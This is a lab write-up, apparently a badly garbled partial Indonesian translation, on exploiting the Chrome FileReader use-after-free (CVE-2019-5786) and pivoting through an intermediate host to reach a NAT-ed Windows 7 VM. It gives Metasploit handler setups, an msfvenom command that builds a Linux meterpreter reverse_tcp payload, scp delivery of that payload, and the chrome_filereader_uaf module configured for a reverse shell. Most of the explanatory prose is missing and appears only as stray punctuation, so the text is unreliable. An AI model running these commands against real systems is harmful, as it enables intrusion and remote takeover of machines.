Get best of the week

Mendapatkan sesi meterpreter di dalam jaringan NAT menggunakan mesin Chrome dan Pivot

gambar


Pendahuluan


Halo semuanya, dalam artikel ini saya ingin berbagi pengalaman saya dalam mengeksploitasi kerentanan Chrome FileReader UAF, melakukan teknik pivot, dan menulis artikel pertama saya tentu saja.


Pentest , , , . , - , My English level is bad, , . , - , , .


CVE-2019-5786 Chrome FileReader Use After Free(UAF) โ€” ( 8 2019 ), , , ( ), .


?


, , , , , JavaScript.



js ยซ ยป โ€” , , (, , ) , . ยซ , ยป, . .


FileReader


FileReader โ€” , File/Blob , (loaded, progress, error ...). ArrayBuffer readToArrayBuffer, , .


HTML5 Web-workers


Web-worker โ€” , JavaScript . , web-worker ( 3D). , web-worker , postMessage.


postMessage API


postMessage โ€” API (iFrame, web-worker, service-worker ..). , โ€” transfer, , -.



, filereader.onprogress ArrayBuffer, .


DOMArrayBuffer* FileReaderLoader::ArrayBufferResult() {
  DCHECK_EQ(read_type_, kReadAsArrayBuffer);
  if (array_buffer_result_)
    return array_buffer_result_;

  // If the loading is not started or an error occurs, return an empty result.
  if (!raw_data_ || error_code_ != FileErrorCode::kOK)
    return nullptr;

  DOMArrayBuffer* result = DOMArrayBuffer::Create(raw_data_->ToArrayBuffer());
  if (finished_loading_) {
    array_buffer_result_ = result;
    AdjustReportedMemoryUsageToV8(
        -1 * static_cast<int64_t>(raw_data_->ByteLength()));
    raw_data_.reset();
  }
  return result;
}

filereader.onprogress, ArrayBuffer.


DOMArrayBuffer* FileReaderLoader::ArrayBufferResult() {
  DCHECK_EQ(read_type_, kReadAsArrayBuffer);
  if (array_buffer_result_)
    return array_buffer_result_;

  // If the loading is not started or an error occurs, return an empty result.
  if (!raw_data_ || error_code_ != FileErrorCode::kOK)
    return nullptr;

  if (!finished_loading_) {
    return DOMArrayBuffer::Create(
        ArrayBuffer::Create(raw_data_->Data(), raw_data_->ByteLength()));
  }

  array_buffer_result_ = DOMArrayBuffer::Create(raw_data_->ToArrayBuffer());
  AdjustReportedMemoryUsageToV8(-1 *
                                static_cast<int64_t>(raw_data_->ByteLength()));
  raw_data_.reset();
  return array_buffer_result_;
}

web-worker postMessage. , , , . , , . .


Pivoting


, , โ€” Pivoting, .


gambar


:


  • (Kali linux).
  • NAT .
  • HiTM (Host in the middle) โ€” , , ( ).

NAT Network Address Translation HiTM , , IP NAT ( IP ). IP .


NAT , IP , (//).


, HiTM , , , !


Pivot , HiTM, , . Pivoting โ€” , .



:


  • Virtual Box ( VMWare ).
  • Kali linux ().
  • Windows 7 ().
  • Linux (HiTM machine).
  • - , , .

:


  1. Virtual box 2 NAT KaliNetwork โ€” 10.0.2.0/24, VMNetwork โ€” 10.0.3.0/24 ( preferences/network).

    gambar
  2. Kali, Network, NAT network KaliNetwork.
  3. (Windows 7) NAT Network VMNetwork.
  4. , KaliNetwork, VMNetwork.
  5. ssh ssh ( ), GatewayPorts = yes /etc/ssh/sshd_config.

    gambar
  6. Chrome 72.0.3626.119 .

, .


. , nmap, , , .


nmap -n -sn 10.0.2.0/24

nmap ping 10.0.2.0/24 ( 10.0.2.1 10.0.2.255) , ( , , ).


gambar


?


  • 10.0.2.7 โ€” Kali.
  • 10.0.2.5 โ€” pivot .
  • virtual box .

HiTM . Metasploit framework โ€” , .


metasploit .


msfconsole -q

.


use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.0.2.7
exploit -j

:


  • use exploit/multi/handler metasploit, .
  • set payload linux/x86/meterpreter/reverce_tcp , meterpreter reverse_tcp , . , bind_tcp.
  • set LHOST 10.0.2.7 , ( 4444).
  • exploit -j .

, , , Kali.


metasploit msfvenom HiTM . .


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.7 LPORT=4444 -f elf > ./expl.elf

gambar


( ).
ssh :


scp ./expl.elf username@10.0.2.5:โ€™expl.elf'

HiTM .


gambar


, meterpreter .


sessions -i 1

ifconfig , 10.0.3.0/24.


gambar


, , Pivot .


. , pivot , , , 10.0.3.0/24 10.0.2.0/24 , payload - , .


pivot , , , .


, metasploit, ssh.


2 :


  • 8080 โ€” .
  • 5555 โ€” meterpreter .

pivot .


gambar


, metasploit .


use exploit/windows/browser/chrome_filereader_uaf
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.3.6
set LPORT 5555
set EXITFUNC thread
set URRIPATH /
exploit -j


  • use exploit/windows/browser/chrome_filreader_uaf , .
  • set payload windows/meterpreter/reverse_tcp meterpreter windows.
  • set LHOST 10.0.3.6 , pivot , VMNetwork, tcp pivot , pivot .
  • set LPORT 5555 5555, 4444 pivot .
  • set EXITFUNC thread , , -, , .
  • set URIPATH / , , http://10.0.3.6:8080/ , .

, chrome, , โ€”no-sandbox .


chrome.exe โ€”-no-sandbox

, IP, LHOST http://10.0.3.6:8080/ โ€” 8080, , , - , .


gambar


- , meterpreter, .


gambar


Pada dasarnya itu semua, kemenangan, kita dapat mengembangkan serangan lebih lanjut seperti yang kita inginkan. Tentu saja, terlalu banyak bintang harus berkumpul untuk mengeksploitasi kerentanan ini, tetapi jaringan bisa berbeda dan manusia juga, jadi menurut pendapat saya, pengetahuan tentang kerentanan ini tidak akan berlebihan, meskipun siapa tahu.


Material



More articles:


All Articles